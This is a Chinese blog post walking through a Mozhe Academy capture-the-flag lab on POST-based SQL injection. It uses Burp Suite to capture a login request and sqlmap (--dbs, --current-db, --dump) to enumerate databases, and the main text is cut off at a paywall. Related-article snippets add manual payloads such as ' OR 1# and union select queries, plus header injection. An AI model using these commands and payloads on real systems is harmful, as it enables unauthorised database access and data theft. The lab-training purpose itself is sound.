墨者学院 - SQL注入漏洞测试(POST)

最新推荐文章于 2024-06-25 17:25:15 发布
最新推荐文章于 2024-06-25 17:25:15 发布
阅读量5.3k 收藏 10
点赞数 2
分类专栏: sql Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81868723
版权
这篇博客介绍了如何通过sqlmap工具对POST请求的SQL注入漏洞进行测试。首先,通过Burp Suite抓取POST请求并保存为txt文件,然后利用sqlmap的--dbs、--current-db、--tables、--columns和--dump等参数,逐步获取数据库名、表名、列名以及数据。在过程中,作者提示了选择不使用公共密码后缀以提高效率。最后,提供了使用--dump --batch参数快速获取所有数据的技巧,强调了更新sqlmap版本的重要性。
摘要由CSDN通过智能技术生成

此题和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显

根据题目提示,post请求

1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt;
2)将txt放在sqlmap目录下;
3)打开sqlmap,使用post注入;


sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名

eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt --dbs

sqlmap.py -r 文件路径/文件名 --current-db //获取当前使用 的数据库

eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt --current-db

 

sqlmap.py -r 文件路径/文件名 --current-db //获取当前使用 的数据库//获取当前数据库中 的所有表名

eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt -

最低0.47元/天 解锁文章
多崎巡礼
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-SQL注入漏洞测试(布尔盲注)
qq_47094508的博客
01-23 3102
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
mysql 注入用例_SQL注入漏洞安全测试(WVS/POST型/手工SQL注入)
weixin_32667439的博客
01-19 836
1、WVS自动化SQL注入测试n 测试目的:测试网站是否存在SQL注入漏洞。n 测试用例:1) Scansettings选择sql injection策略;2) 输入扫描网站URL,一直下一步(如果需要登陆点击New Login Sqquence);3) 如果扫描结果如下显示,则网站不通过;5) 针对get形式url中存在多个参数,可以通过-p选项指定。2、W...
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 679
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
渗透测试SQL注入
CheatMyself的博客
06-25 1803
按照攻击类型分为:联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等按照注入位置分为:HTTP头注入、请求参数注入等按照数据库场景分为:MySQL注入、MSSQL注入、Oracle场景注入。
SQL注入漏洞测试(POST)
qq_36933272的博客
09-04 1789
任意输入用户名密码 开启burpsuite,设置代理,截断登陆POST请求的数据包 将数据包保存为txt文件,打开sqlmap 开始爆数据库,表,列,字段值,例如:sqlmap -r txt文件路径 --dbs;sqlmap -r txt文件路径 -D 数据库名 --tables;sqlmap -r txt文件路径 -D 数据库名 -T 表名 --columns … 爆出name值,passwor...
SQL手工注入漏洞测试(PostgreSQL数据库)-墨者
weoptions的博客
12-04 981
———靶场专栏———记录我的打靶过程
SQL注入漏洞-POST注入
HacHunter的博客
03-06 2569
POST是HTTP/1.1协议中的一种资源请求方法。其向指定资源提交数据,请求服务器进行处理(例如提交表单或者上传文件)。数据被包含在请求本文中。这个请求可能会创建新的资源或修改现有资源,或二者皆有。 在很大一部分的表单都是通过POST方式发送到处理页面的。 显错注入 关键代码为: 构造语句来显示所有的用户名和密码 ’OR 1# 关键代码为: 正常輸入因為數據庫里沒有所以查不到任何數據,而要查看到所有數據就需要使條件變為true 构造语句来显示所有的用户名和密码 "..
墨者 - SQL手工注入漏洞测试(PostgreSQL数据库)
吃肉唐僧的博客
07-09 1076
用order by测试字段数 字段为4 测试回显位置 /new_list.php?id=1 and 1=2 union select '1','2','3','4' 暴库 /new_list.php?id=1 and 1=2 union select '1',(select current_database()),'3','4' 爆表 ,这里有两种方法...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
2. **SQL注入示例**:当DB2存在SQL注入漏洞时,可以通过输入`4`来表示希望查询的列数为4。这通常意味着,如果攻击者能够成功构造SQL语句,就能从数据库中获取4列数据。 3. **列名猜测**:使用专门的SQL注入工具...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **攻击**:攻击者可能会利用SQL注入、XSS(跨站脚本)或其他方法来注入恶意代码,然后在服务器端执行。 3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害*...
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
sql注入漏洞检测方法
xiuzhentianting的博客
09-04 2963
具有参数的地址: 可以用 啊D注入工具v2.32争抢版 或者 Domain4.3明小子 mssql的sysobject检测,可以加上过滤条件,比如 UNICODE(substring(xtype,1,1)) between 85 And 85 端口扫描用ScanPort1.2
墨者学院-SQL注入漏洞测试(HTTP头注入)
JimWu的博客
09-04 1280
SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
针对mysql的sql注入漏洞测试(MySql版)
白瞳洛的博客
08-11 649
我们先来判断下这个表中有几个字段使用 order by1以上的,如果说页面不正常了,肯定就超过这个数了,比如我们使用6来。6报错那就表述这个字段只有5个了。 id=1 order by 6# id=1-1 union select 1,2,3,4,5#--下面获取每个字段 我们换成user(),@@version数据库版本,database()当前使用的数据库,@@basedirmysql的安装路径,随后会返回一些敏感信息 id=1-1 union select user(),@@v...
Web安全 SQL注入漏洞测试
qq_73710216的博客
04-23 860
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,再使用 order by 测试字段数有多少.(如果指定的列不存在,数据库会报错,通过报错判断查询结果的列数,从而确定主查询的字段数.)(再使用 # 注释掉后面的)
墨者学院--SQL注入漏洞测试(HTTP头注入)
Routine_limon的博客
07-19 907
这道题需要使用到Burp suite这个工具。先简单的说下使用步骤: 简述下4个按钮的作用: ①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。 ②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。 ③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is ...
墨者SQL注入漏洞测试(HTTP头注入)
wswr的博客
03-10 814
思路:根据题设吧,那肯定是往http的字段注入了,那就是看看分别啥字段,然后挨个试试注入语句试试,然后吧就会发现注入点(事实上这题最难的地方就是发现注入点,我感觉嗷) sql注入HTTP头部注入_hhhshd的博客-CSDN博客 看完这俩大哥思路应该就清晰了 原理:大概就是服务器端用函数抓取头部验证时,没有做什么限制,这样很危险,使得我们可以通过抓包修改字段内容来注入 点进去再说咯 刷新抓包,然后送到Repeatr那开始试注入点 反正就每个头部都加上 万能的 admin' or ..
19、SQL注入漏洞测试入门
lqyzkn的博客
08-11 183
内容 Sqlmap获取 SQL注入的基本流程与 Sqlmap 基本用法 实战 1、Sqlmap获取 2. SQL注入的基本流程与 Sqlmap 基本用法 注意:cmd中方向键 ↑ 会回显上一条命令。 3、实战 另一种方法: 然后重复上面的操作:–dbs等等 一些敏感文件信息最好不要去动,容易出事!!! 小结 由于工具版本容易引起安全问题,建议在虚拟机中下载运行! ...
自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2594
SQL注入漏洞
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值